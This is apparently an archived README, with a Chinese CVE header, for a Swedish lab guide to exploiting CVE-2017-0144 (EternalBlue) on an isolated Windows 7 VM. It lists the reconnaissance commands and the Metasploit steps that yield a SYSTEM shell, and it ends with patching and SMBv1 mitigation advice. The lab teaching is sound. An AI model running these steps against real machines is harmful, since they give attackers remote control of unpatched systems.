关联漏洞
标题:Microsoft Windows SMB 输入验证错误漏洞 (CVE-2017-0144)描述:Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block(SMB)Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏洞。远程攻击者可借助特制的数据包利用该
介绍
# Windows-7_och_CVE-2017-0144_Exploit
Detta är en Guide på hur du kan test sårbarheten CVE-2017-0144 som användes som exploit av den kända ransomware WannaCry. Jag kommer även att gå genom hur man kan Skydda sig.
Material som används:
- Windows 7 Ultimate SP1 x64 - https://www.kali.org/get-kali/#kali-virtual-machines
- Kali Linux - https://archive.org/details/win-7-ult-sp-1-english-x-64
- Oracle Virtualbox (Eller valfri) - https://www.virtualbox.org/wiki/Downloads
Vi börjar med att sätta upp miljön i Virtualbox.
<img width="802" height="117" alt="image" src="https://github.com/user-attachments/assets/fe1d98f2-f1c7-4c46-8f2e-54414de21f21" />
Vi vill inte att maskinerna ska kunna nå internet:
Högerklicka på virtuella maskinen -> Settings -> Network -> Gå till Adapter och ändra till Host-Only som visas på bilden nedan.
<img width="561" height="169" alt="image" src="https://github.com/user-attachments/assets/2e7d3218-7c8a-4b12-be4a-e4f182bd6d90" />
Detta ska du göra på både Kali och Windows 7 enheterna.
//
Nu ska vi starta upp båda Windows 7 samt Kali
För windows måste du gå genom installationen sedan gå till Windows Firewall och stänga av brandväggen, följ bilderna.
<img width="691" height="527" alt="image" src="https://github.com/user-attachments/assets/afdd5ae1-32c5-44dd-949d-8b819e59e5e4" />
<img width="690" height="534" alt="image" src="https://github.com/user-attachments/assets/dfe2b02b-8092-4393-9171-78a4863d7416" />
<img width="692" height="530" alt="image" src="https://github.com/user-attachments/assets/668cfa09-afbd-4ae6-bfe9-4d514baf81a2" />
//
Efter att vi har stängt av brandväggen kan vi gå över till kali linux som vi har installerat, logga in med:
- Användarnamet: Kali
- Lösenordet: kali
Först vi ska se till att det är rätt datum och tid.
<img width="691" height="499" alt="image" src="https://github.com/user-attachments/assets/2ffb7be6-a76e-44e5-8ed2-f9703cf7c782" />
<img width="688" height="499" alt="image" src="https://github.com/user-attachments/assets/6b387b80-8e16-4be9-aa3c-8cbee7a3ce0c" />
<img width="693" height="501" alt="image" src="https://github.com/user-attachments/assets/1105af40-4d26-43d2-824a-b30e96a9822b" />
<img width="689" height="497" alt="image" src="https://github.com/user-attachments/assets/c98fdc4e-2ba1-4640-8ce1-7552e2cac6d2" />
Sedan ska du ställa in rätt time zone.
<img width="688" height="501" alt="image" src="https://github.com/user-attachments/assets/6a640104-e727-46a3-b61e-51294f4379d4" />
När du har ställt in rätt ska du trycka på Lock -> Authenticate.
//
Nu är vi klara med sätta upp miljön och är redo för att utföra en angrepp för att testa sårbarheten.
Det första steget vi ska göra är att ta reda på vilken ip adress vi har på vår kali maskin.
- Öppna terminalen sedan skriv: ip a
Under eth0 leta efter inet och tilldelda ip adressen.
<img width="687" height="495" alt="image" src="https://github.com/user-attachments/assets/a3896439-5cb8-43af-a990-37ed4291eecc" />
Nu vet vi att vi har adressen 192.168.56.102 nästa steg ska vi sniffa information genom vår anslutning.
- I terminalen skriv: Sudo netdiscover
Efter att du har autentiserat, det som händer är att vi skickar broadcast föråga till alla i vårt nätverk.
<img width="689" height="499" alt="image" src="https://github.com/user-attachments/assets/99af8f29-6768-44c3-a41a-c90128cebc89" />
Här får vi alla enheter eller ip adresser som finns. Tryck Control + C
Nu ska vi ta reda på vilka oprativsystem kör dessa enheter.
- Därmed skriv: Sudo nmap -O [Alla ip adresser som du fick fram]
<img width="686" height="500" alt="image" src="https://github.com/user-attachments/assets/0b0ccfd2-ace0-4c24-8b9f-af0c2a3dbddd" />
Nu får vi fram information som vi behöver läsa genom och hitta det som är intressant för oss.
<img width="559" height="403" alt="image" src="https://github.com/user-attachments/assets/46162314-c5b4-4a71-b133-13fa26b3da6b" />
Vi kan se att dessa två enheter har ointressant information.
Dock så är vi på rätt spår och nu har vi ip addressen till vår windows 7 maskin.
<img width="560" height="402" alt="image" src="https://github.com/user-attachments/assets/5f275ef1-b32a-41b6-9e80-87a30866282c" />
//
Nu när vi har tillräckligt mycket information som Ip-adress och vilken oprativsystem offret har kan vi utföra vår exploit. Skriv följande komando:
- msfconsole
<img width="696" height="504" alt="image" src="https://github.com/user-attachments/assets/32513295-32c3-45d8-a45f-cc425c334733" />
- use exploit/windows/smb/ms17_010_eternalblue
<img width="688" height="501" alt="image" src="https://github.com/user-attachments/assets/4836957b-8ec8-4fcf-9e0b-290dcc132851" />
- set RHOSTS [Offrets IP Adress]
<img width="686" height="500" alt="image" src="https://github.com/user-attachments/assets/af2620d1-f5d2-47ab-aac6-a0780bbe1127" />
- set LHOST eth0
<img width="696" height="499" alt="image" src="https://github.com/user-attachments/assets/964679fc-1e90-44ad-a896-e7b6d940ad82" />
- run
<img width="691" height="502" alt="image" src="https://github.com/user-attachments/assets/80b99b15-f07b-41bd-b45e-5eb316fb9d2d" />
Grattis du lyckats om du ser meterpreter>
//
Nu när vi är inne ska vi kolla upp vad vi har för rättigheter skriv i terminalen:
- shell
- whoami
<img width="689" height="500" alt="image" src="https://github.com/user-attachments/assets/d19a586e-869f-4ee5-b7ed-d0c577bf0aeb" />
Här ser vi vilken Windows version som är installerat samt att vi har system rättigheter.
Om du vill visa att du är inne på ett coolt sätt skriv detta i terminalen:
- msg * "Du har blivit hackad!"
<img width="694" height="1031" alt="image" src="https://github.com/user-attachments/assets/acd9c4d2-b1fa-4e2f-abcb-5486bfe5f034" />
//
Hur kan man skydda sig mot denna exploit?
- För att åtgärda detta måste man installera säkerhetsuppdateringen MS17-010 från Microsoft samt inaktivera det gamla protokollet SMBv1 i Windows-inställningarna. Även säga till att brandväggen är rätt konfigrerat.
** Tack för att ni kollar på min Guide! **
文件快照
[4.0K] /data/pocs/5830ea30dc8ba1d97d3388dfdb0456bd1620e87b
└── [6.0K] README.md
1 directory, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。